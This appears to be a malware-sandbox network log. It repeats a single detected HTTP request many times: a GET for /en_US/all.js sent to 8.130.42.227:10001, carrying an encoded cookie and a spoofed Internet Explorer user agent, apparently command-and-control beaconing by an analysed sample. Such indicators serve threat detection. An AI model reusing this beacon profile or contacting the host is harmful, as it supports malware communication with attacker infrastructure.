            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
